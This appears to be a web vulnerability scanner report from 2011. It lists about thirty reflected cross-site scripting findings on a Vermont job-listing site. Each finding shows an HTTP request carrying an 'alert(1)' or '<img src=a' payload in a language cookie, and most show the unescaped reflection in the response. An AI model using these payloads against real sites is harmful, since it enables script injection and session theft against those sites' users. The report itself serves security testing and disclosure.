| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/default.cfm |
| GET /ada/default.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en60b78"><img%20src%3da |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:15:12 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Pragma: no-cache Expires: 06 Nov 1994 08:49:37 GMT Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/etp/etp_newuser_dsp |
| GET /ada/etp/etp_newuser_dsp Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en7e46b"%3balert(1)/ |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:15:34 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Pragma: no-cache Expires: {ts '2011-04-29 17:15:33'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN7E46B";ALERT(1)/ ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/etp/etp_newuser_dsp |
| GET /ada/etp/etp_newuser_dsp Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=ene9fd5"><img%20src%3da |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:15:23 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Pragma: no-cache Expires: {ts '2011-04-29 17:15:22'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/leavesite.cfm |
| GET /ada/leavesite.cfm?title Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en1dd09"><img%20src%3da |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:15:12 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/leavesite.cfm |
| GET /ada/leavesite.cfm?title Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en345b0"%3balert(1)/ |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:15:19 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN345B0";ALERT(1)/ ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_eligibility_dsp |
| GET /ada/mn_eligibility_dsp Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en192b5"%3balert(1)/ |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:14:55 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN192B5";ALERT(1)/ ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_eligibility_dsp |
| GET /ada/mn_eligibility_dsp Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=ene8914"><img%20src%3da |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:14:48 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_forgotpass.cfm |
| GET /ada/mn_forgotpass.cfm HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontj User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TEST=1; SYSTRANLANGUAGE=ened9d5"><img%20src%3da |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:08:24 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_forgotpass.cfm |
| GET /ada/mn_forgotpass.cfm Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontj Cache-Control: max-age=0 Origin: https://www.vermontj User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TEST=1; SYSTRANLANGUAGE=en58b0b"><img%20src%3da |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:09:44 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_forgotpass.cfm |
| GET /ada/mn_forgotpass.cfm HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontj User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TEST=1; SYSTRANLANGUAGE=enbceb4"%3balert(1)/ |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:08:26 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//ENBCEB4";ALERT(1)/ ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_forgotpass.cfm |
| GET /ada/mn_forgotpass.cfm Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontj Cache-Control: max-age=0 Origin: https://www.vermontj User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TEST=1; SYSTRANLANGUAGE=en7b001"%3balert(1)/ |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:09:45 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN7B001";ALERT(1)/ ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_login_fnc.cfm |
| GET /ada/mn_login_fnc.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=enb71b2"><img%20src%3da |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:21:00 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Pragma: no-cache Expires: 06 Nov 1994 08:49:37 GMT Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_login_fnc.cfm |
| GET /ada/mn_login_fnc.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en93c3c"%3balert(1)/ |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:21:12 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Pragma: no-cache Expires: 06 Nov 1994 08:49:37 GMT Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN93C3C";ALERT(1)/ ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_offices_dsp.cfm |
| GET /ada/mn_offices_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en2e535"><img%20src%3da |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:15:03 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_offices_dsp.cfm |
| GET /ada/mn_offices_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=enaffbc"%3balert(1)/ |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:15:12 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//ENAFFBC";ALERT(1)/ ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_protectyourself |
| GET /ada/mn_protectyourself Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en9e2b8"%3balert(1)/ |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:20:11 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN9E2B8";ALERT(1)/ ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_protectyourself |
| GET /ada/mn_protectyourself Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=enf9d3d"><img%20src%3da |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:20:02 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_quicksearch_dsp |
| GET /ada/mn_quicksearch_dsp Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en86c8d"%3balert(1)/ |
| HTTP/1.1 200 OK Connection: close Date: Sat, 30 Apr 2011 01:36:55 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Pragma: no-cache Expires: 06 Nov 1994 08:49:37 GMT Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN86C8D";ALERT(1)/ ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_quicksearch_dsp |
| GET /ada/mn_quicksearch_dsp Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=endecca"><img%20src%3da |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:21:59 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Pragma: no-cache Expires: 06 Nov 1994 08:49:37 GMT Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_quicksearch_dsp |
| GET /ada/mn_quicksearch_dsp Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en2e2e6"%3balert(1)/ |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:22:15 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Pragma: no-cache Expires: 06 Nov 1994 08:49:37 GMT Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN2E2E6";ALERT(1)/ ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_registration_dsp |
| GET /ada/mn_registration_dsp Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=enad224"><img%20src%3da |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:14:58 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Pragma: no-cache Pragma: no-cache Expires: 06 Nov 1994 08:49:37 GMT Expires: {ts '2011-04-29 17:14:56'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate cache-control: no-cache, no-store, must-revalidate <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_registration_dsp |
| GET /ada/mn_registration_dsp Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en6ecf6"%3balert(1)/ |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:15:06 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Pragma: no-cache Pragma: no-cache Expires: 06 Nov 1994 08:49:37 GMT Expires: {ts '2011-04-29 17:15:05'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate cache-control: no-cache, no-store, must-revalidate <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN6ECF6";ALERT(1)/ ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_registration_dsp |
| GET /ada/mn_registration_dsp Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en7e15f"><img%20src%3da |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:15:54 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Pragma: no-cache Pragma: no-cache Expires: 06 Nov 1994 08:49:37 GMT Expires: {ts '2011-04-29 17:15:53'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate cache-control: no-cache, no-store, must-revalidate <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_registration_dsp |
| GET /ada/mn_registration_dsp Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en87b2f"%3balert(1)/ |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:16:08 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Pragma: no-cache Pragma: no-cache Expires: 06 Nov 1994 08:49:37 GMT Expires: {ts '2011-04-29 17:16:08'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate cache-control: no-cache, no-store, must-revalidate <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN87B2F";ALERT(1)/ ...[SNIP]... |
| Severity: | Information |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_settings_dsp.cfm |
| GET /ada/mn_settings_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=enb8fd5"%3balert(1)/ |
